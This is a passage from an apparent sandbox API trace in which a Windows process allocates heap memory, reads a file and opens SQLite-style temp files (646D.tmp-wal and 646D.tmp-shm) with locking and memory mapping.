| out: hHeap=0x2dc0000) returned 1 [0160.693] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2dec20 | out: lpFileSizeHigh=0x2dec20*=0x0) returned 0x80000 [0160.699] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa0c80) returned 0x7e0020 [0160.699] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x7e0020) returned 0xa0c80 [0160.699] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x7e0020) returned 0xa0c80 [0160.701] ReadFile (in: hFile=0x160, lpBuffer=0x878c00, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2debfc, lpOverlapped=0x2debdc | out: lpBuffer=0x878c00*, lpNumberOfBytesRead=0x2debfc*=0x8000, lpOverlapped=0x2debdc) returned 1 [0160.741] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xc0) returned 0x392a330 [0160.741] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0xc0 [0160.741] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0160.741] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x392a3f8 [0160.741] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3f8) returned 0x64 [0160.741] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x392a3f8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal") returned 50 [0160.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2deba4 | out: lpFileInformation=0x2deba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.741] GetLastError () returned 0x2 [0160.741] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-wal"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0160.743] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3f8) returned 0x64 [0160.743] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a3f8 | out: hHeap=0x2dc0000) returned 1 [0160.743] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x4) returned 0x39298b0 [0160.743] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298b0) returned 0x4 [0160.743] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a3f8 [0160.743] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3f8) returned 0x10 [0160.743] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xae) returned 0x392a410 [0160.743] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a410) returned 0xae [0160.743] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0160.743] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x3929ca8 [0160.743] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x64 [0160.743] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a480, cbMultiByte=-1, lpWideCharStr=0x3929ca8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm") returned 50 [0160.743] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-shm"), fInfoLevelId=0x0, lpFileInformation=0x2dead4 | out: lpFileInformation=0x2dead4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0160.743] GetLastError () returned 0x2 [0160.743] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-shm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0160.744] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0x64 [0160.744] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ca8 | out: hHeap=0x2dc0000) returned 1 [0160.744] LockFileEx (in: hFile=0x164, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb14 | out: lpOverlapped=0x2deb14) returned 1 [0160.744] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x2deb14*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2deb14*=0) returned 0x0 [0160.744] SetEndOfFile (hFile=0x164) returned 1 [0160.744] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2deb18 | out: lpOverlapped=0x2deb18) returned 1 [0160.744] LockFileEx (in: hFile=0x164, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb14 | out: lpOverlapped=0x2deb14) returned 1 [0160.744] GetFileSize (in: hFile=0x164, lpFileSizeHigh=0x2deb6c | out: lpFileSizeHigh=0x2deb6c*=0x0) returned 0x0 [0160.744] LockFileEx (in: hFile=0x164, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb74 | out: lpOverlapped=0x2deb74) returned 1 [0160.744] GetFileSize (in: hFile=0x164, lpFileSizeHigh=0x2deb6c | out: lpFileSizeHigh=0x2deb6c*=0x0) returned 0x0 [0160.744] SetFilePointer (in: hFile=0x164, lDistanceToMove=32768, lpDistanceToMoveHigh=0x2deb44*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2deb44*=0) returned 0x8000 [0160.744] SetEndOfFile (hFile=0x164) returned 1 [0160.745] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x8) returned 0x392a4c8 [0160.745] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4c8) returned 0x8 [0160.745] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8000, lpName=0x0) returned 0x168 [0160.745] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8000) returned 0x270000 [0160.745] LockFileEx (in: hFile=0x164, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x2, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb04 | out: lpOverlapped=0x2deb04) returned 1 [0160.745] LockFileEx (in: hFile=0x164, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x4, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb04 | out: lpOverlapped=0x2deb04) returned 1 [0160.745] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x2deb60 | out: lpFileSizeHigh=0x2deb60*=0x0) returned 0x0 [0160.745] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x2, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2deb08 | out: lpOverlapped=0x2deb08) returned 1 [0160.745] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x4, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2deb08 | out: lpOverlapped=0x2deb08) returned 1 [0160.745] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2deb78 | out: lpOverlapped=0x2deb78) returned 1 [0160.746] LockFileEx (in: hFile=0x164, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2deb90 | out: lpOverlapped=0x2deb90) returned 1 [0160.746] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2dec20 | out: lpFileSizeHigh=0x2dec20*=0x0) returned 0x80000 [0160.746] ReadFile (in: hFile=0x160, lpBuffer=0x878c00, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2debfc, lpOverlapped=0x2debdc | out: lpBuffer=0x878c00*, lpNumberOfBytesRead=0x2debfc*=0x8000, lpOverlapped=0x2debdc) returned 1 [0160.777] _aulldvrm () returned 0x0 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xc) returned 0x3929ca8 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ca8) returned 0xc [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929cc0 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cc0) returned 0x50 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb) returned 0x3929d18 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d18) returned 0xb [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929d30 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d30) returned 0x80 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x3929db8 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929db8) returned 0x10 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x3929dd0 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0xe [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929de8 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929de8) returned 0x30 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x3929e20 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e20) returned 0x2 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929e30 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e30) returned 0x30 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e20) returned 0x2 [0160.778] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e20 | out: hHeap=0x2dc0000) returned 1 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929de8) returned 0x30 [0160.778] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929de8 | out: hHeap=0x2dc0000) returned 1 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x19) returned 0x3929de8 [0160.778] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929de8) returned 0x19 [0160.778] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929e68 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e68) returned 0x30 [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2) returned 0x3929e10 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e10) returned 0x2 [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929ea0 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ea0) returned 0x30 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e10) returned 0x2 [0160.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e10 | out: hHeap=0x2dc0000) returned 1 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e68) returned 0x30 [0160.779] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e68 | out: hHeap=0x2dc0000) returned 1 [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x3929e10 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e10) returned 0xa [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb) returned 0x3929e68 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e68) returned 0xb [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a780 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0xa [0160.779] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a798 [0160.779] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xa [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xf) returned 0x392a7b0 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0xf [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d30) returned 0x80 [0160.780] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x3929d30, Size=0x100) returned 0x3929ed8 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ed8) returned 0x100 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x3929e80 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e80) returned 0x15 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x3929d30 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d30) returned 0x15 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x11) returned 0x3929d50 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d50) returned 0x11 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 0x3929d70 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d70) returned 0x13 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x35) returned 0x3929fe0 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x35 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x3929d90 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1c [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x35) returned 0x392a020 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a020) returned 0x35 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1c [0160.780] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x3929d90, Size=0x34) returned 0x392a060 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x34 [0160.780] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x35) returned 0x392a0a0 [0160.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0a0) returned 0x35 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x34 [0160.781] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x392a060, Size=0x64) returned 0x392af68 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x64 [0160.781] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x36) returned 0x392a060 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x36 [0160.781] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x41) returned 0x392a0e0 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0e0) returned 0x41 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x64 [0160.781] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x392af68, Size=0xc4) returned 0x392af68 [0160.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0xc4 [0160.792] _aulldvrm () returned 0x0 [0160.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1f) returned 0x3929d90 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1f [0160.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x97) returned 0x392b038 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b038) returned 0x97 [0160.792] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x35 [0160.792] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fe0 | out: hHeap=0x2dc0000) returned 1 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a020) returned 0x35 [0160.792] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a020 | out: hHeap=0x2dc0000) returned 1 [0160.792] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0a0) returned 0x35 [0160.792] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a0a0 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a060) returned 0x36 [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a060 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0e0) returned 0x41 [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a0e0 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0xc4 [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af68 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1f [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d90 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7e0 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7e0) returned 0x10 [0160.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929fe0 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0xe0 [0160.793] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x392b0d8 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b0d8) returned 0x3fc [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b0d8) returned 0x3fc [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b0d8) returned 0x3fc [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b0d8 | out: hHeap=0x2dc0000) returned 1 [0160.793] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0xe0 [0160.793] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fe0 | out: hHeap=0x2dc0000) returned 1 [0160.799] _aulldvrm () returned 0x0 [0160.799] _aulldvrm () returned 0x0 [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3b) returned 0x392af68 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x3b [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x3929d90 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1c [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x36) returned 0x392afb0 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392afb0) returned 0x36 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d90) returned 0x1c [0160.800] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x3929d90, Size=0x34) returned 0x392aff0 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aff0) returned 0x34 [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x41) returned 0x3929fe0 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x41 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aff0) returned 0x34 [0160.800] RtlReAllocateHeap (Heap=0x2dc0000, Flags=0x0, Ptr=0x392aff0, Size=0x64) returned 0x392a030 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a030) returned 0x64 [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x58) returned 0x392a0a0 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0a0) returned 0x58 [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xc) returned 0x392a7f8 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xc [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xf) returned 0x392a810 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xf [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x77) returned 0x392b0d8 [0160.800] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b0d8) returned 0x77 [0160.800] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a828 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x10 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x3b [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af68 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392afb0) returned 0x36 [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392afb0 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0x41 [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fe0 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a030) returned 0x64 [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a030 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xc [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7f8 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0a0) returned 0x58 [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a0a0 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xf [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a810 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929fe0 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0xe0 [0160.801] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x392b158 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b158) returned 0x3fc [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b158) returned 0x3fc [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b158) returned 0x3fc [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b158 | out: hHeap=0x2dc0000) returned 1 [0160.801] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929fe0) returned 0xe0 [0160.801] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929fe0 | out: hHeap=0x2dc0000) returned 1 [0160.801] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de8a4 | out: lpOverlapped=0x2de8a4) returned 1 [0160.801] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x13) returned 